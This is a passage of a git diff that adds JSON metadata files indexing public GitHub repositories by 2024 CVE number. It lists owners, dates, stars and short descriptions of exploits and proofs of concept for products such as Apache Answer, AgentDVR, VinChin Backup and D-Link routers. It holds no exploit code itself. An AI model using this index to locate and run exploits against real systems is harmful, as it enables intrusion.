"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-22275", + "description": "CVE-2024-22275: Partial File Read in VMware vCenter Server", + "fork": false, + "created_at": "2024-07-06T18:14:28Z", + "updated_at": "2024-07-11T03:00:33Z", + "pushed_at": "2024-07-06T18:24:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2024-22275", + "cves", + "file-read" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22369.json b/2024/CVE-2024-22369.json new file mode 100644 index 0000000000..4a0482ca69 --- /dev/null +++ b/2024/CVE-2024-22369.json @@ -0,0 +1,33 @@ +[ + { + "id": 741418632, + "name": "CVE-2024-22369", + "full_name": "oscerd\/CVE-2024-22369", + "owner": { + "login": "oscerd", + "id": 5106647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5106647?v=4", + "html_url": "https:\/\/github.com\/oscerd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oscerd\/CVE-2024-22369", + "description": "CVE-2024-22369 Reproducer", + "fork": false, + "created_at": "2024-01-10T11:01:59Z", + "updated_at": "2024-07-31T01:23:49Z", + "pushed_at": "2024-02-20T17:48:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22393.json b/2024/CVE-2024-22393.json new file mode 100644 index 0000000000..20feda044d --- /dev/null +++ b/2024/CVE-2024-22393.json @@ -0,0 +1,39 @@ +[ + { + "id": 769052536, + "name": "CVE-2024-22393", + "full_name": "omranisecurity\/CVE-2024-22393", + "owner": { + "login": "omranisecurity", + "id": 38619429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38619429?v=4", + "html_url": "https:\/\/github.com\/omranisecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omranisecurity\/CVE-2024-22393", + "description": "Exploit for CVE-2024-22393 Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.", + "fork": false, + "created_at": "2024-03-08T08:45:12Z", + "updated_at": "2024-05-30T13:17:54Z", + "pushed_at": "2024-05-12T07:42:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "answer", + "apache", + "cve-2024-22393", + "exploit", + "exploit-cve-2024-22393" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22411.json b/2024/CVE-2024-22411.json new file mode 100644 index 0000000000..817b65f40b --- /dev/null +++ b/2024/CVE-2024-22411.json @@ -0,0 +1,33 @@ +[ + { + "id": 745408511, + "name": "avo-CVE-2024-22411", + "full_name": "tamaloa\/avo-CVE-2024-22411", + "owner": { + "login": "tamaloa", + "id": 118779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118779?v=4", + "html_url": "https:\/\/github.com\/tamaloa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamaloa\/avo-CVE-2024-22411", + "description": null, + "fork": false, + "created_at": "2024-01-19T09:19:52Z", + "updated_at": "2024-01-19T09:22:19Z", + "pushed_at": "2024-01-19T09:27:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22416.json b/2024/CVE-2024-22416.json new file mode 100644 index 0000000000..42316eb304 --- /dev/null +++ b/2024/CVE-2024-22416.json @@ -0,0 +1,33 @@ +[ + { + "id": 744906613, + "name": "ensimag-secu3a-cve-2024-22416", + "full_name": "mindstorm38\/ensimag-secu3a-cve-2024-22416", + "owner": { + "login": "mindstorm38", + "id": 17071361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17071361?v=4", + "html_url": "https:\/\/github.com\/mindstorm38", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mindstorm38\/ensimag-secu3a-cve-2024-22416", + "description": "CVE-2024-22416 exploit experiments", + "fork": false, + "created_at": "2024-01-18T08:49:07Z", + "updated_at": "2024-01-19T13:14:54Z", + "pushed_at": "2024-01-19T13:22:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2242.json b/2024/CVE-2024-2242.json new file mode 100644 index 0000000000..ebe69afe42 --- /dev/null +++ b/2024/CVE-2024-2242.json @@ -0,0 +1,33 @@ +[ + { + "id": 888883677, + "name": "CVE-2024-2242", + "full_name": "RandomRobbieBF\/CVE-2024-2242", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-2242", + "description": "Contact Form 7 <= 5.9 - Reflected Cross-Site Scripting", + "fork": false, + "created_at": "2024-11-15T07:32:31Z", + "updated_at": "2024-11-15T07:34:53Z", + "pushed_at": "2024-11-15T07:34:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22514.json b/2024/CVE-2024-22514.json new file mode 100644 index 0000000000..7dc6d5f3ac --- /dev/null +++ b/2024/CVE-2024-22514.json @@ -0,0 +1,33 @@ +[ + { + "id": 749163366, + "name": "CVE-2024-22514-Remote-Code-Execution", + "full_name": "Orange-418\/CVE-2024-22514-Remote-Code-Execution", + "owner": { + "login": "Orange-418", + "id": 46978010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4", + "html_url": "https:\/\/github.com\/Orange-418", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Orange-418\/CVE-2024-22514-Remote-Code-Execution", + "description": null, + "fork": false, + "created_at": "2024-01-27T19:04:56Z", + "updated_at": "2024-01-27T19:04:56Z", + "pushed_at": "2024-02-07T00:18:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22515.json b/2024/CVE-2024-22515.json new file mode 100644 index 0000000000..283a787f31 --- /dev/null +++ b/2024/CVE-2024-22515.json @@ -0,0 +1,64 @@ +[ + { + "id": 749102873, + "name": "AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution", + "full_name": "Orange-418\/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution", + "owner": { + "login": "Orange-418", + "id": 46978010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4", + "html_url": "https:\/\/github.com\/Orange-418", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Orange-418\/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution", + "description": "CVE-2024-22515 arbitrary file upload and CVE-2024-22514 remote code execution for AgentDVR 5.1.6.0 (Authenticated)", + "fork": false, + "created_at": "2024-01-27T15:36:05Z", + "updated_at": "2024-02-09T20:03:09Z", + "pushed_at": "2024-03-15T03:19:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749159831, + "name": "CVE-2024-22515-File-Upload-Vulnerability", + "full_name": "Orange-418\/CVE-2024-22515-File-Upload-Vulnerability", + "owner": { + "login": "Orange-418", + "id": 46978010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4", + "html_url": "https:\/\/github.com\/Orange-418", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Orange-418\/CVE-2024-22515-File-Upload-Vulnerability", + "description": null, + "fork": false, + "created_at": "2024-01-27T18:51:26Z", + "updated_at": "2024-01-27T18:51:26Z", + "pushed_at": "2024-02-07T00:09:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22526.json b/2024/CVE-2024-22526.json new file mode 100644 index 0000000000..9817c75e59 --- /dev/null +++ b/2024/CVE-2024-22526.json @@ -0,0 +1,33 @@ +[ + { + "id": 845358398, + "name": "CVE-2024-22526", + "full_name": "200101WhoAmI\/CVE-2024-22526", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-22526", + "description": "bandi view", + "fork": false, + "created_at": "2024-08-21T05:11:26Z", + "updated_at": "2024-08-21T05:12:04Z", + "pushed_at": "2024-08-21T05:12:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22532.json b/2024/CVE-2024-22532.json new file mode 100644 index 0000000000..a7ac610a47 --- /dev/null +++ b/2024/CVE-2024-22532.json @@ -0,0 +1,33 @@ +[ + { + "id": 761709560, + "name": "CVE-2024-22532", + "full_name": "pwndorei\/CVE-2024-22532", + "owner": { + "login": "pwndorei", + "id": 96749184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96749184?v=4", + "html_url": "https:\/\/github.com\/pwndorei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwndorei\/CVE-2024-22532", + "description": null, + "fork": false, + "created_at": "2024-02-22T10:44:38Z", + "updated_at": "2024-02-22T10:44:38Z", + "pushed_at": "2024-02-23T07:26:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22534.json b/2024/CVE-2024-22534.json new file mode 100644 index 0000000000..391768f6cf --- /dev/null +++ b/2024/CVE-2024-22534.json @@ -0,0 +1,33 @@ +[ + { + "id": 748333405, + "name": "CVE-2024-22534", + "full_name": "austino2000\/CVE-2024-22534", + "owner": { + "login": "austino2000", + "id": 99389401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99389401?v=4", + "html_url": "https:\/\/github.com\/austino2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/austino2000\/CVE-2024-22534", + "description": null, + "fork": false, + "created_at": "2024-01-25T18:57:34Z", + "updated_at": "2024-01-25T18:57:35Z", + "pushed_at": "2024-01-25T19:06:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2257.json b/2024/CVE-2024-2257.json new file mode 100644 index 0000000000..8522846fa1 --- /dev/null +++ b/2024/CVE-2024-2257.json @@ -0,0 +1,33 @@ +[ + { + "id": 816772228, + "name": "Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257", + "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257", + "description": null, + "fork": false, + "created_at": "2024-06-18T11:27:57Z", + "updated_at": "2024-06-18T11:28:00Z", + "pushed_at": "2024-06-18T11:27:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22640.json b/2024/CVE-2024-22640.json new file mode 100644 index 0000000000..73be4171db --- /dev/null +++ b/2024/CVE-2024-22640.json @@ -0,0 +1,33 @@ +[ + { + "id": 780492523, + "name": "CVE-2024-22640", + "full_name": "zunak\/CVE-2024-22640", + "owner": { + "login": "zunak", + "id": 14941490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4", + "html_url": "https:\/\/github.com\/zunak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zunak\/CVE-2024-22640", + "description": null, + "fork": false, + "created_at": "2024-04-01T15:43:07Z", + "updated_at": "2024-04-16T17:19:46Z", + "pushed_at": "2024-04-01T16:23:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22641.json b/2024/CVE-2024-22641.json new file mode 100644 index 0000000000..7700461c9a --- /dev/null +++ b/2024/CVE-2024-22641.json @@ -0,0 +1,33 @@ +[ + { + "id": 780504370, + "name": "CVE-2024-22641", + "full_name": "zunak\/CVE-2024-22641", + "owner": { + "login": "zunak", + "id": 14941490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4", + "html_url": "https:\/\/github.com\/zunak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zunak\/CVE-2024-22641", + "description": null, + "fork": false, + "created_at": "2024-04-01T16:11:28Z", + "updated_at": "2024-07-21T11:59:57Z", + "pushed_at": "2024-04-01T16:13:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22752.json b/2024/CVE-2024-22752.json new file mode 100644 index 0000000000..2b3ade9e04 --- /dev/null +++ b/2024/CVE-2024-22752.json @@ -0,0 +1,33 @@ +[ + { + "id": 767442265, + "name": "CVE-2024-22752", + "full_name": "hacker625\/CVE-2024-22752", + "owner": { + "login": "hacker625", + "id": 32318573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32318573?v=4", + "html_url": "https:\/\/github.com\/hacker625", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacker625\/CVE-2024-22752", + "description": "EaseUS MobiMover 6.0.5 Build 21620 - Insecure Files and Folders Permissions", + "fork": false, + "created_at": "2024-03-05T09:54:00Z", + "updated_at": "2024-03-06T07:18:17Z", + "pushed_at": "2024-03-05T10:26:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22774.json b/2024/CVE-2024-22774.json new file mode 100644 index 0000000000..f88f70c7c3 --- /dev/null +++ b/2024/CVE-2024-22774.json @@ -0,0 +1,33 @@ +[ + { + "id": 776665274, + "name": "CVE-2024-22774", + "full_name": "Gray-0men\/CVE-2024-22774", + "owner": { + "login": "Gray-0men", + "id": 39830524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39830524?v=4", + "html_url": "https:\/\/github.com\/Gray-0men", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gray-0men\/CVE-2024-22774", + "description": "Panoramic Dental Imaging software Stealthy Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2024-03-24T05:59:57Z", + "updated_at": "2024-05-16T20:52:09Z", + "pushed_at": "2024-05-16T20:52:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22853.json b/2024/CVE-2024-22853.json new file mode 100644 index 0000000000..ea557f9292 --- /dev/null +++ b/2024/CVE-2024-22853.json @@ -0,0 +1,33 @@ +[ + { + "id": 821748358, + "name": "CVE-2024-22853", + "full_name": "FaLLenSKiLL1\/CVE-2024-22853", + "owner": { + "login": "FaLLenSKiLL1", + "id": 43922662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4", + "html_url": "https:\/\/github.com\/FaLLenSKiLL1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-22853", + "description": "D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.", + "fork": false, + "created_at": "2024-06-29T10:21:11Z", + "updated_at": "2024-06-29T10:26:52Z", + "pushed_at": "2024-06-29T10:26:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22867.json b/2024/CVE-2024-22867.json new file mode 100644 index 0000000000..2f45ca0ad6 --- /dev/null +++ b/2024/CVE-2024-22867.json @@ -0,0 +1,33 @@ +[ + { + "id": 755770647, + "name": "CVE-2024-22867", + "full_name": "brandon-t-elliott\/CVE-2024-22867", + "owner": { + "login": "brandon-t-elliott", + "id": 126433368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126433368?v=4", + "html_url": "https:\/\/github.com\/brandon-t-elliott", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brandon-t-elliott\/CVE-2024-22867", + "description": null, + "fork": false, + "created_at": "2024-02-11T01:52:52Z", + "updated_at": "2024-02-11T01:52:52Z", + "pushed_at": "2024-02-11T01:52:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22889.json b/2024/CVE-2024-22889.json new file mode 100644 index 0000000000..0c49ba80ce --- /dev/null +++ b/2024/CVE-2024-22889.json @@ -0,0 +1,33 @@ +[ + { + "id": 748125203, + "name": "CVE-2024-22889-Plone-v6.0.9", + "full_name": "shenhav12\/CVE-2024-22889-Plone-v6.0.9", + "owner": { + "login": "shenhav12", + "id": 93703363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4", + "html_url": "https:\/\/github.com\/shenhav12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-22889-Plone-v6.0.9", + "description": null, + "fork": false, + "created_at": "2024-01-25T10:26:29Z", + "updated_at": "2024-01-25T10:26:29Z", + "pushed_at": "2024-01-25T10:50:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22890.json b/2024/CVE-2024-22890.json new file mode 100644 index 0000000000..8671007bb0 --- /dev/null +++ b/2024/CVE-2024-22890.json @@ -0,0 +1,33 @@ +[ + { + "id": 742168455, + "name": "CVE-2024-22890", + "full_name": "BurakSevben\/CVE-2024-22890", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-22890", + "description": null, + "fork": false, + "created_at": "2024-01-11T22:30:50Z", + "updated_at": "2024-01-30T21:51:15Z", + "pushed_at": "2024-01-31T00:26:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22891.json b/2024/CVE-2024-22891.json new file mode 100644 index 0000000000..6f64e176d0 --- /dev/null +++ b/2024/CVE-2024-22891.json @@ -0,0 +1,33 @@ +[ + { + "id": 853174224, + "name": "CVE-2024-22891", + "full_name": "EQSTLab\/CVE-2024-22891", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-22891", + "description": "PoC for CVE-2024-22891", + "fork": false, + "created_at": "2024-09-06T06:13:39Z", + "updated_at": "2024-09-06T06:14:03Z", + "pushed_at": "2024-09-06T06:14:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22894.json b/2024/CVE-2024-22894.json new file mode 100644 index 0000000000..416dc6c842 --- /dev/null +++ b/2024/CVE-2024-22894.json @@ -0,0 +1,33 @@ +[ + { + "id": 749150559, + "name": "CVE-2024-22894", + "full_name": "Jaarden\/CVE-2024-22894", + "owner": { + "login": "Jaarden", + "id": 78766934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78766934?v=4", + "html_url": "https:\/\/github.com\/Jaarden", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jaarden\/CVE-2024-22894", + "description": null, + "fork": false, + "created_at": "2024-01-27T18:17:48Z", + "updated_at": "2024-11-12T21:00:30Z", + "pushed_at": "2024-05-29T11:39:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22899.json b/2024/CVE-2024-22899.json new file mode 100644 index 0000000000..5a1a22c186 --- /dev/null +++ b/2024/CVE-2024-22899.json @@ -0,0 +1,53 @@ +[ + { + "id": 714997705, + "name": "CVE-2024-22899-to-22903-ExploitChain", + "full_name": "Chocapikk\/CVE-2024-22899-to-22903-ExploitChain", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-22899-to-22903-ExploitChain", + "description": "Comprehensive Exploit Chain for Multiple Vulnerabilities in VinChin Backup & Recovery <= 7.2", + "fork": false, + "created_at": "2023-11-06T09:24:15Z", + "updated_at": "2024-08-12T20:33:00Z", + "pushed_at": "2024-02-01T17:24:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authenticated-rce", + "cve-2024-22899", + "cve-2024-22900", + "cve-2024-22901", + "cve-2024-22902", + "cve-2024-22903", + "cybersecurity", + "ethical-hacking", + "exploit-chain", + "exploit-development", + "hacking-tools", + "infosec", + "open-source-security", + "penetration-testing", + "reverse-engineering", + "security-research", + "security-vulnerability", + "vinchin-exploit", + "vulnerability-research" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22909.json b/2024/CVE-2024-22909.json new file mode 100644 index 0000000000..2bf84d50d6 --- /dev/null +++ b/2024/CVE-2024-22909.json @@ -0,0 +1,33 @@ +[ + { + "id": 742200216, + "name": "CVE-2024-22909", + "full_name": "BurakSevben\/CVE-2024-22909", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-22909", + "description": null, + "fork": false, + "created_at": "2024-01-12T00:40:29Z", + "updated_at": "2024-01-30T22:29:11Z", + "pushed_at": "2024-01-31T00:27:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22922.json b/2024/CVE-2024-22922.json new file mode 100644 index 0000000000..7df623bed0 --- /dev/null +++ b/2024/CVE-2024-22922.json @@ -0,0 +1,33 @@ +[ + { + "id": 748143351, + "name": "CVE-2024-22922", + "full_name": "keru6k\/CVE-2024-22922", + "owner": { + "login": "keru6k", + "id": 73579653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4", + "html_url": "https:\/\/github.com\/keru6k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keru6k\/CVE-2024-22922", + "description": "A Broken Authentication Vulnerability found in Projectworlds' Visitor Management System", + "fork": false, + "created_at": "2024-01-25T11:14:43Z", + "updated_at": "2024-01-25T11:18:28Z", + "pushed_at": "2024-01-25T11:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22939.json b/2024/CVE-2024-22939.json new file mode 100644 index 0000000000..8f34f3ef7f --- /dev/null +++ b/2024/CVE-2024-22939.json @@ -0,0 +1,33 @@ +[ + { + "id": 748050298, + "name": "CVE-2024-22939", + "full_name": "NUDTTAN91\/CVE-2024-22939", + "owner": { + "login": "NUDTTAN91", + "id": 127911311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127911311?v=4", + "html_url": "https:\/\/github.com\/NUDTTAN91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NUDTTAN91\/CVE-2024-22939", + "description": "CVE-2024-22939", + "fork": false, + "created_at": "2024-01-25T07:00:38Z", + "updated_at": "2024-04-08T02:43:41Z", + "pushed_at": "2024-01-25T07:30:38Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22983.json b/2024/CVE-2024-22983.json new file mode 100644 index 0000000000..4397418c66 --- /dev/null +++ b/2024/CVE-2024-22983.json @@ -0,0 +1,33 @@ +[ + { + "id": 748116927, + "name": "CVE-2024-22983", + "full_name": "keru6k\/CVE-2024-22983", + "owner": { + "login": "keru6k", + "id": 73579653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4", + "html_url": "https:\/\/github.com\/keru6k", + 